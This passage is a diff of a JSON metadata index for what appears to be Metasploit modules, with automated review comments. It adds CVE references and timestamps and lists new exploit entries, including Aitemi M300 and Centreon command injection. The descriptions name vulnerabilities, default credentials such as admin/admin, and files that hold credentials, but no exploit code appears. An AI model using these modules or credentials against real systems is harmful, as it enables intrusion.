@@ -31779,7 +32034,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-20 13:20:44 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/barracuda_directory_traversal",
@@ -33360,6 +33615,7 @@
],
"description": "This module exploits a directory traversal flaw found in Clansphere 2011.3.\n The application fails to handle the cs_lang parameter properly, which can be\n used to read any file outside the virtual directory.",
"references": [
"CVE-2012-10034",
"OSVDB-86720",
"EDB-22181"
],
@@ -33382,7 +33638,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/http/clansphere_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/clansphere_traversal",
@@ -33757,6 +34013,7 @@
],
"description": "This module exploits an unauthenticated directory traversal vulnerability\n in the Dicoogle PACS Web Server v2.5.0 and possibly earlier, allowing an\n attacker to read arbitrary files with the web server privileges.\n While the application is java based, the directory traversal was only\n successful against Windows targets.",
"references": [
"CVE-2018-25113",
"EDB-45007"
],
"platform": "",
@@ -33778,7 +34035,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/http/dicoogle_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/dicoogle_traversal",
@@ -34327,6 +34584,7 @@
],
"description": "Dolibarr version 16 < 16.0.5 is vulnerable to a pre-authentication contact database dump.\n An unauthenticated attacker may retrieve a company's entire customer file, prospects, suppliers,\n and potentially employee information if a contact file exists.\n Both public and private notes are also included in the dump.",
"references": [
"CVE-2023-33568",
"URL-https://www.dsecbypass.com/en/dolibarr-pre-auth-contact-database-dump/",
"URL-https://github.com/Dolibarr/dolibarr/blob/16.0.5/ChangeLog#L34",
"URL-https://github.com/Dolibarr/dolibarr/commit/bb7b69ef43673ed403436eac05e0bc31d5033ff7",
@@ -34351,7 +34609,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-25 11:20:47 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/http/dolibarr_16_contact_dump.rb",
"is_install_path": true,
"ref_name": "scanner/http/dolibarr_16_contact_dump",
@@ -34871,7 +35129,8 @@
"description": "This module exploits an OS Command Injection vulnerability in Cambium\n ePMP 1000 (<v2.5) device management portal. It requires any one of the\n following login credentials - admin/admin, installer/installer, home/home - to\n dump system hashes.",
"references": [
"URL-http://ipositivesecurity.com/2015/11/28/cambium-epmp-1000-multiple-vulnerabilities/",
"URL-https://support.cambiumnetworks.com/file/476262a0256fdd8be0e595e51f5112e0f9700f83"
"URL-https://support.cambiumnetworks.com/file/476262a0256fdd8be0e595e51f5112e0f9700f83",
"ATT&CK-T1003"
],
"platform": "",
"arch": "",
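Review bot: this hunk only adds "ATT&CK-T1003" to epmp1000_dump_hashes, while the sibling hunk below for epmp1000_ping_cmd_exec, which cites the same two advisory URLs (ipositivesecurity.com and support.cambiumnetworks.com), receives "CVE-2017-5255". Since both modules describe the same OS command injection in the ePMP 1000 (<v2.5) management portal, please check whether the CVE also applies to the hash-dumping variant and, if so, add it here so the two entries stay consistent.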
@@ -34892,7 +35151,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-09-08 17:30:59 +0000",
"path": "/modules/auxiliary/scanner/http/epmp1000_dump_hashes.rb",
"is_install_path": true,
"ref_name": "scanner/http/epmp1000_dump_hashes",
@@ -34982,6 +35241,7 @@
],
"description": "This module exploits an OS Command Injection vulnerability in Cambium\n ePMP 1000 (<v2.5) device management portal. It requires any one of the\n following login credentials - admin/admin, installer/installer, home/home - to\n execute arbitrary system commands.",
"references": [
"CVE-2017-5255",
"URL-http://ipositivesecurity.com/2015/11/28/cambium-epmp-1000-multiple-vulnerabilities/",
"URL-https://support.cambiumnetworks.com/file/476262a0256fdd8be0e595e51f5112e0f9700f83"
],
@@ -35004,7 +35264,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/http/epmp1000_ping_cmd_exec.rb",
"is_install_path": true,
"ref_name": "scanner/http/epmp1000_ping_cmd_exec",
@@ -37500,6 +37760,7 @@
],
"description": "This module allows for traversing the file system of a host running httpdasm v0.92.",
"references": [
"CVE-2010-10012",
"EDB-15861"
],
"platform": "",
@@ -37521,7 +37782,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/http/httpdasm_directory_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/httpdasm_directory_traversal",
@@ -38761,6 +39022,7 @@
],
"description": "This module attempts to test whether a file traversal vulnerability\n is present in version of linknat vos2009/vos3000",
"references": [
"CVE-2025-34118",
"URL-http://www.linknat.com/",
"URL-http://www.wooyun.org/bugs/wooyun-2010-0145458"
],
@@ -38783,7 +39045,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/http/linknat_vos_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/linknat_vos_traversal",
@@ -38817,6 +39079,7 @@
],
"description": "This module exploits a directory traversal vulnerability which is present in\n different Linksys home routers, like the E1500.",
"references": [
"CVE-2013-10062",
"URL-http://www.s3cur1ty.de/m1adv2013-004",
"URL-http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=1&docid=d7d0a87be9864e20bc347a73f194411f_KB_EN_v1.xml",
"BID-57760",
@@ -38842,7 +39105,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-20 13:20:44 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/linksys_e1500_traversal",
@@ -39842,6 +40105,7 @@
],
"description": "This module exploits a directory traversal vulnerability which is present in\n Netgear SPH200D Skype telephone.",
"references": [
"CVE-2013-10063",
"BID-57660",
"EDB-24441",
"URL-http://support.netgear.com/product/SPH200D",
@@ -39866,7 +40130,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-20 13:20:44 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/netgear_sph200d_traversal",
@@ -41231,6 +41495,57 @@
"needs_cleanup": false,
"actions": []
},
"auxiliary_scanner/http/redoc_exposed": {
"name": "ReDoc API Docs UI Exposed",
"fullname": "auxiliary/scanner/http/redoc_exposed",
"aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Hamza Sahin ( <Hamza Sahin (@hamzasahin61)>"
],
"description": "Detects publicly exposed ReDoc API documentation pages.\n The module performs safe, read-only GET requests and reports likely\n ReDoc instances based on HTML markers.",
"references": [],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2025-10-08 03:43:31 +0000",
"path": "/modules/auxiliary/scanner/http/redoc_exposed.rb",
"is_install_path": true,
"ref_name": "scanner/http/redoc_exposed",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [],
"SideEffects": [
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": false,
"actions": []
},
"auxiliary_scanner/http/replace_ext": {
"name": "HTTP File Extension Scanner",
"fullname": "auxiliary/scanner/http/replace_ext",
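Review bot: the author string in the new redoc_exposed entry is malformed: "Hamza Sahin ( <Hamza Sahin (@hamzasahin61)>" has an unbalanced "(" and nests the name inside the angle brackets, so it will render badly wherever the author list is shown; it should be a single name plus handle in the same shape as the other entries on this page (for example "Nicholas Starke <nick@alephvoid.com>"). Also note that "references" is empty and "disclosure_date" is null for this module; a reference to the ReDoc project or to the HTML markers the description says are used for detection would help users judge false-positive risk.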
@@ -41396,6 +41711,7 @@
],
"description": "This module exploits a directory traversal vulnerability in the RIPS Scanner v0.54,\n allowing to read arbitrary files with the web server privileges.",
"references": [
"CVE-2025-34126",
"EDB-18660",
"URL-http://codesec.blogspot.com/2015/03/rips-scanner-v-054-local-file-include.html"
],
@@ -41418,7 +41734,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/http/rips_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/rips_traversal",
@@ -41453,6 +41769,7 @@
],
"description": "This module exploits an authenticated arbitrary file read in the log module's filter engine.\n SteelHead VCX (VCX255U) version 9.6.0a was confirmed as vulnerable.",
"references": [
"CVE-2025-34098",
"EDB-42101"
],
"platform": "",
@@ -41474,7 +41791,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-20 13:20:44 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/http/riverbed_steelhead_vcx_file_read.rb",
"is_install_path": true,
"ref_name": "scanner/http/riverbed_steelhead_vcx_file_read",
@@ -41577,6 +41894,7 @@
],
"description": "This module exploits a directory traversal vulnerability found in S40 CMS.\n The flaw is due to the 'page' function not properly handling the $pid parameter,\n which allows a malicious user to load an arbitrary file path.",
"references": [
"CVE-2011-10009",
"OSVDB-82469",
"EDB-17129"
],
@@ -41599,7 +41917,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/http/s40_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/s40_traversal",
@@ -41910,6 +42228,7 @@
],
"description": "This module exploits an unauthenticated path traversal vulnerability found in ManageEngine\n ServiceDesk Plus build 9110 and lower. The module will retrieve any file on the filesystem\n with the same privileges as Support Center Plus is running. On Windows, files can be retrieved\n with SYSTEM privileges. The issue has been resolved in ServiceDesk Plus build 91111 (issue SD-60283).",
"references": [
"CVE-2011-2757",
"URL-https://www.manageengine.com/products/service-desk/readme-9.1.html"
],
"platform": "",
@@ -41931,7 +42250,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/http/servicedesk_plus_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/servicedesk_plus_traversal",
@@ -42288,6 +42607,7 @@
],
"description": "This module abuses a directory traversal vulnerability in the url_redirect.cgi application\n accessible through the web interface of Supermicro Onboard IPMI controllers. The vulnerability\n is present due to a lack of sanitization of the url_name parameter. This allows an attacker with\n a valid, but not necessarily administrator-level account, to access the contents of any file\n on the system. This includes the /nv/PSBlock file, which contains the cleartext credentials for\n all configured accounts. This module has been tested on a Supermicro Onboard IPMI (X9SCL/X9SCM)\n with firmware version SMT_X9_214. Other file names to try include /PSStore, /PMConfig.dat, and\n /wsman/simple_auth.passwd",
"references": [
"CVE-2013-6785",
"URL-https://www.rapid7.com/blog/post/2013/11/06/supermicro-ipmi-firmware-vulnerabilities/",
"URL-https://github.com/zenfish/ipmi/blob/master/dump_SM.py"
],
@@ -42310,7 +42630,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/smt_ipmi_url_redirect_traversal",
@@ -42398,6 +42718,7 @@
],
"description": "This module exploits a directory traversal bug in Sockso on port\n 4444. This is done by using \"../\" in the path to retrieve a file on\n a vulnerable machine.",
"references": [
"CVE-2012-10061",
"URL-http://aluigi.altervista.org/adv/sockso_1-adv.txt"
],
"platform": "",
@@ -42419,7 +42740,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/http/sockso_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/sockso_traversal",
@@ -44584,6 +44905,7 @@
],
"description": "This module exploits a directory traversal vulnerability found in WebPageTest.\n Due to the way the gettext.php script handles the 'file' parameter, it is possible\n to read a file outside the www directory.",
"references": [
"CVE-2019-17199",
"EDB-19790",
"OSVDB-83817"
],
@@ -44606,7 +44928,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/http/webpagetest_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/webpagetest_traversal",
@@ -45208,6 +45530,7 @@
],
"description": "Abandoned Cart, a plugin for WordPress which extends the WooCommerce plugin,\n prior to 5.8.2 is affected by an unauthenticated SQL injection via the\n billing_first_name parameter of the save_data AJAX call. A valid\n wp_woocommerce_session cookie is required, which has at least one item in the\n cart.",
"references": [
"CVE-2025-47608",
"WPVDB-10461",
"URL-https://wpdeeply.com/woocommerce-abandoned-cart-before-5-8-2-sql-injection/",
"URL-https://plugins.trac.wordpress.org/changeset/2413885"
@@ -45231,7 +45554,7 @@
"https"
],
"targets": null,
"mod_time": "2023-04-12 13:09:34 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/http/wp_abandoned_cart_sqli.rb",
"is_install_path": true,
"ref_name": "scanner/http/wp_abandoned_cart_sqli",
@@ -45270,6 +45593,7 @@
],
"description": "An arbitrary file deletion vulnerability in the WordPress core allows any user with privileges of an\n Author to completely take over the WordPress site and to execute arbitrary code on the server.",
"references": [
"CVE-2018-12895",
"WPVDB-9100",
"EDB-44949",
"PACKETSTORM-148333",
@@ -45295,7 +45619,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/http/wp_arbitrary_file_deletion.rb",
"is_install_path": true,
"ref_name": "scanner/http/wp_arbitrary_file_deletion",
@@ -45801,6 +46125,7 @@
],
"description": "This module exploits a directory traversal vulnerability in WordPress Plugin\n GI-Media Library version 2.2.2, allowing to read arbitrary files from the\n system with the web server privileges. This module has been tested successfully\n on GI-Media Library version 2.2.2 with WordPress 4.1.3 on Ubuntu 12.04 Server.",
"references": [
"CVE-2015-10136",
"WPVDB-7754",
"URL-http://web.archive.org/web/20191021124407/http://wordpressa.quantika14.com/repository/index.php?id=24"
],
@@ -45823,7 +46148,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb",
"is_install_path": true,
"ref_name": "scanner/http/wp_gimedia_library_file_read",
@@ -46110,6 +46435,7 @@
],
"description": "This module exploits a directory traversal vulnerability in WordPress Plugin\n \"WP Mobile Edition\" version 2.2.7, allowing to read arbitrary files with the\n web server privileges.",
"references": [
"CVE-2015-9406",
"EDB-36733",
"WPVDB-7898"
],
@@ -46132,7 +46458,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb",
"is_install_path": true,
"ref_name": "scanner/http/wp_mobileedition_file_read",
@@ -46230,6 +46556,7 @@
],
"description": "This module exploits an authenticated directory traversal vulnerability\n in WordPress Plugin \"NextGEN Gallery\" version 2.1.7, allowing\n to read arbitrary directories with the web server privileges.",
"references": [
"CVE-2015-9538",
"WPVDB-8165",
"URL-http://permalink.gmane.org/gmane.comp.security.oss.general/17650"
],
@@ -46252,7 +46579,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb",
"is_install_path": true,
"ref_name": "scanner/http/wp_nextgen_galley_file_read",
@@ -46527,6 +46854,7 @@
],
"description": "This module exploits a directory traversal vulnerability in WordPress Plugin\n \"Simple Backup\" version 2.7.10, allowing to read arbitrary files with the\n web server privileges.",
"references": [
"CVE-2015-10134",
"WPVDB-7997",
"PACKETSTORM-131919"
],
@@ -46549,7 +46877,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb",
"is_install_path": true,
"ref_name": "scanner/http/wp_simple_backup_file_read",
@@ -46584,6 +46912,7 @@
],
"description": "This module exploits an authenticated directory traversal vulnerability\n in WordPress Plugin \"Subscribe to Comments\" version 2.1.2, allowing\n to read arbitrary files with the web server privileges.",
"references": [
"CVE-2015-10133",
"WPVDB-8102",
"PACKETSTORM-132694",
"URL-https://advisories.dxw.com/advisories/admin-only-local-file-inclusion-and-arbitrary-code-execution-in-subscribe-to-comments-2-1-2/"
@@ -46607,7 +46936,7 @@
"https"
],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb",
"is_install_path": true,
"ref_name": "scanner/http/wp_subscribe_comments_file_read",
@@ -46703,6 +47032,7 @@
],
"description": "This module exploits an unauthenticated database backup vulnerability in WordPress plugin\n 'Boldgrid-Backup' also known as 'Total Upkeep' version < 1.14.10.\n First, `env-info.php` is read to get server information. Next, `restore-info.json` is\n read to retrieve the last backup file. That backup is then downloaded, and any sql\n files will be parsed looking for the wp_users INSERT statement to grab user creds.",
"references": [
"CVE-2020-36848",
"EDB-49252",
"WPVDB-10502",
"WPVDB-10503",
@@ -46727,7 +47057,7 @@
"https"
],
"targets": null,
"mod_time": "2023-04-12 13:09:34 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/http/wp_total_upkeep_downloader.rb",
"is_install_path": true,
"ref_name": "scanner/http/wp_total_upkeep_downloader",
@@ -47198,6 +47528,7 @@
],
"description": "This module exploits a authenticated directory traversal vulnerability in Zen Load\n Balancer `v3.10.1`. The flaw exists in 'index.cgi' not properly handling 'filelog='\n parameter which allows a malicious actor to load arbitrary file path.",
"references": [
"CVE-2020-11491",
"EDB-48308"
],
"platform": "",
@@ -47219,7 +47550,7 @@
"https"
],
"targets": null,
"mod_time": "2023-02-03 18:12:53 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/http/zenload_balancer_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/zenload_balancer_traversal",
@@ -47772,7 +48103,7 @@
"autofilter_ports": [],
"autofilter_services": [],
"targets": null,
"mod_time": "2025-08-11 16:37:37 +0000",
"mod_time": "2025-02-12 17:47:18 +0000",
"path": "/modules/auxiliary/scanner/ldap/ldap_login.rb",
"is_install_path": true,
"ref_name": "scanner/ldap/ldap_login",
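Review bot: the mod_time for ldap_login moves backwards in this hunk, from "2025-08-11 16:37:37 +0000" to "2025-02-12 17:47:18 +0000", which is the opposite direction of every other mod_time change in this diff. That usually means the metadata was regenerated against an older copy of the module file or a revert landed; please confirm this is intended rather than a stale checkout.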
@@ -48221,6 +48552,7 @@
],
"description": "Retrieve CUPS version and kernel version information from cups-browsed services.",
"references": [
"CVE-2024-47176",
"URL-https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8",
"URL-https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/"
],
@@ -48230,7 +48562,7 @@
"autofilter_ports": [],
"autofilter_services": [],
"targets": null,
"mod_time": "2024-09-28 02:35:39 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/misc/cups_browsed_info_disclosure.rb",
"is_install_path": true,
"ref_name": "scanner/misc/cups_browsed_info_disclosure",
@@ -48375,6 +48707,7 @@
],
"description": "This module exploits a file retrieval vulnerability in\n EasyCafe Server. The vulnerability can be triggered by\n sending a specially crafted packet (opcode 0x43) to the\n 831/TCP port.\n This module has been successfully tested on EasyCafe Server\n version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3\n and Windows 7 SP1.\n Note that the server will throw a popup messagebox if the\n specified file does not exist.",
"references": [
"CVE-2025-34119",
"EDB-39102"
],
"platform": "",
@@ -48383,7 +48716,7 @@
"autofilter_ports": [],
"autofilter_services": [],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb",
"is_install_path": true,
"ref_name": "scanner/misc/easycafe_server_fileaccess",
@@ -51508,7 +51841,7 @@
"postgres"
],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-09-02 16:31:33 +0000",
"path": "/modules/auxiliary/scanner/postgres/postgres_login.rb",
"is_install_path": true,
"ref_name": "scanner/postgres/postgres_login",
@@ -55714,7 +56047,7 @@
"microsoft-ds"
],
"targets": null,
"mod_time": "2025-06-20 13:20:44 +0000",
"mod_time": "2025-09-12 14:27:32 +0000",
"path": "/modules/auxiliary/scanner/smb/smb_login.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb_login",
@@ -56837,14 +57170,16 @@
"Nicholas Starke <nick@alephvoid.com>"
],
"description": "This module exploits a default misconfiguration flaw on Apache Karaf versions 2.x-4.x.\n The 'karaf' user has a known default password, which can be used to login to the\n SSH service, and execute operating system commands from remote.",
"references": [],
"references": [
"ATT&CK-T1003.008"
],
"platform": "Unix",
"arch": "cmd",
"rport": 8101,
"autofilter_ports": [],
"autofilter_services": [],
"targets": null,
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-09-16 18:31:30 +0000",
"path": "/modules/auxiliary/scanner/ssh/apache_karaf_command_execution.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/apache_karaf_command_execution",
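Review bot: the added "ATT&CK-T1003.008" mapping does not match the behaviour this entry describes: the description says the module logs in over SSH with the known default 'karaf' password and executes operating system commands, and never mentions reading /etc/passwd or /etc/shadow, which is what T1003.008 covers. Either the description should state that the module dumps those files, or the technique should be one that matches default-credential access and command execution as described.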
@@ -57363,7 +57698,7 @@
"autofilter_ports": [],
"autofilter_services": [],
"targets": null,
"mod_time": "2025-06-20 13:20:44 +0000",
"mod_time": "2025-09-15 14:08:25 +0000",
"path": "/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb",
"is_install_path": true,
"ref_name": "scanner/ssh/ssh_login_pubkey",
@@ -57617,7 +57952,7 @@
"autofilter_ports": [],
"autofilter_services": [],
"targets": null,
"mod_time": "2025-08-22 14:00:32 +0000",
"mod_time": "2025-09-03 11:08:43 +0000",
"path": "/modules/auxiliary/scanner/ssl/ssl_version.rb",
"is_install_path": true,
"ref_name": "scanner/ssl/ssl_version",
@@ -66351,7 +66686,7 @@
"targets": [
"Apple iOS"
],
"mod_time": "2024-11-18 17:32:48 +0000",
"mod_time": "2025-10-24 18:02:35 +0000",
"path": "/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb",
"is_install_path": true,
"ref_name": "apple_ios/ssh/cydia_default_ssh",
@@ -67497,6 +67832,7 @@
],
"description": "This module exploits a command injection vulnerability found in the eScan Web Management\n Console. The vulnerability exists while processing CheckPass login requests. An attacker\n with a valid username can use a malformed password to execute arbitrary commands. With\n mwconf privileges, the runasroot utility can be abused to get root privileges. This module\n has been tested successfully on eScan 5.5-2 on Ubuntu 12.04.",
"references": [
"CVE-2014-125118",
"URL-http://www.joxeankoret.com/download/breaking_av_software-pdf.tar.gz"
],
"platform": "Linux",
@@ -67520,7 +67856,7 @@
"targets": [
"eScan 5.5-2 / Linux"
],
"mod_time": "2025-05-10 18:15:04 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/antivirus/escan_password_exec.rb",
"is_install_path": true,
"ref_name": "linux/antivirus/escan_password_exec",
@@ -68023,6 +68359,64 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/aitemi_m300_time_rce": {
"name": "Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE (time param)",
"fullname": "exploit/linux/http/aitemi_m300_time_rce",
"aliases": [],
"rank": 400,
"disclosure_date": "2025-08-07",
"type": "exploit",
"author": [
"Valentin Lobstein"
],
"description": "This module exploits an unauthenticated remote command injection vulnerability\n in the Shenzhen Aitemi M300 Wi-Fi Repeater (hardware model MT02). The vulnerability\n lies in the 'time' parameter of the time configuration endpoint, which is passed\n unsanitized to a shell command executed via the `date -s` mechanism. The injection\n executes with root privileges, without requiring authentication, reboot, or\n network reconfiguration.",
"references": [
"URL-https://chocapikk.com/posts/2025/when-a-wifi-name-gives-you-root-part-two/",
"CVE-2025-34152"
],
"platform": "Unix",
"arch": "cmd, mipsbe",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix Command",
"Linux Meterpreter MIPSBE (MAY crash HTTP worker)"
],
"mod_time": "2025-08-14 16:37:13 +0000",
"path": "/modules/exploits/linux/http/aitemi_m300_time_rce.rb",
"is_install_path": true,
"ref_name": "linux/http/aitemi_m300_time_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-service-down"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/alcatel_omnipcx_mastercgi_exec": {
"name": "Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution",
"fullname": "exploit/linux/http/alcatel_omnipcx_mastercgi_exec",
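Review bot: in the new aitemi_m300_time_rce entry the references list puts the blog URL before "CVE-2025-34152", whereas every other entry on this page lists the CVE identifier first; reorder for consistency with the rest of the metadata file. Separately, the "Stability" note is "crash-service-down" while the second target is labelled "Linux Meterpreter MIPSBE (MAY crash HTTP worker)"; it would help users if the description said which target carries the crash risk, since the first target (Unix Command) appears to be the safer choice.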
@@ -69068,6 +69462,7 @@
],
"description": "This module exploits vulnerabilities found in Astium astium-confweb-2.1-25399 RPM and\n lower. A SQL Injection vulnerability is used to achieve authentication bypass and gain\n admin access. From an admin session arbitrary PHP code upload is possible. It is used\n to add the final PHP payload to \"/usr/local/astium/web/php/config.php\" and execute the\n \"sudo /sbin/service astcfgd reload\" command to reload the configuration and achieve\n remote root code execution.",
"references": [
"CVE-2013-10043",
"OSVDB-88860",
"EDB-23831"
],
@@ -69092,7 +69487,7 @@
"targets": [
"Astium 2.1"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-06 17:15:11 +0000",
"path": "/modules/exploits/linux/http/astium_sqli_upload.rb",
"is_install_path": true,
"ref_name": "linux/http/astium_sqli_upload",
@@ -69185,6 +69580,8 @@
],
"description": "This module exploits a directory traversal vulnerability in ATutor on an Apache/PHP\n setup with display_errors set to On, which can be used to allow us to upload a malicious\n ZIP file. On the web application, a blacklist verification is performed before extraction,\n however it is not sufficient to prevent exploitation.\n\n You are required to login to the target to reach the vulnerability, however this can be\n done as a student account and remote registration is enabled by default.\n\n Just in case remote registration isn't enabled, this module uses 2 vulnerabilities\n in order to bypass the authentication:\n\n 1. confirm.php Authentication Bypass Type Juggling vulnerability\n 2. password_reminder.php Remote Password Reset TOCTOU vulnerability",
"references": [
"CVE-2016-2555",
"CVE-2017-1000002",
"URL-http://www.atutor.ca/",
"URL-http://sourceincite.com/research/src-2016-09/",
"URL-http://sourceincite.com/research/src-2016-10/",
@@ -69212,7 +69609,7 @@
"targets": [
"Automatic"
],
"mod_time": "2025-06-23 12:43:46 +0000",
"mod_time": "2025-10-07 14:03:32 +0000",
"path": "/modules/exploits/linux/http/atutor_filemanager_traversal.rb",
"is_install_path": true,
"ref_name": "linux/http/atutor_filemanager_traversal",
@@ -69848,6 +70245,66 @@
"session_types": false,
"needs_cleanup": true
},
"exploit_linux/http/centreon_auth_rce_cve_2025_5946": {
"name": "Centreon authenticated command injection leading to RCE via broker engine \"reload\" parameter",
"fullname": "exploit/linux/http/centreon_auth_rce_cve_2025_5946",
"aliases": [],
"rank": 600,
"disclosure_date": "2025-09-24",
"type": "exploit",
"author": [
"h00die-gr3y <h00die.gr3y@gmail.com>"
],
"description": "Centreon is a platform designed to monitor your cloud and on-premises infrastructure.\n This module exploits an command injection vulnerability using the `broker engine reload` setting\n on the poller configuration page of the Centreon web application. Injecting a malcious payload\n at the `broker engine reload` parameter and restarting the poller triggers this vulnerability.\n You need have admin access at the Centreon Web application in order to execute this RCE.\n This issue affects all Centreon editions >= `19.10.0` and it is fixed in Centreon Web versions\n `24.10.13`, `24.04.18` and `23.10.28`.",
"references": [
"CVE-2025-5946",
"URL-https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-5946-centreon-web-all-versions-high-severity-5104",
"URL-https://attackerkb.com/topics/23D4cUoBZj/cve-2025-5946"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix/Linux Command"
],
"mod_time": "2025-11-05 09:20:13 +0000",
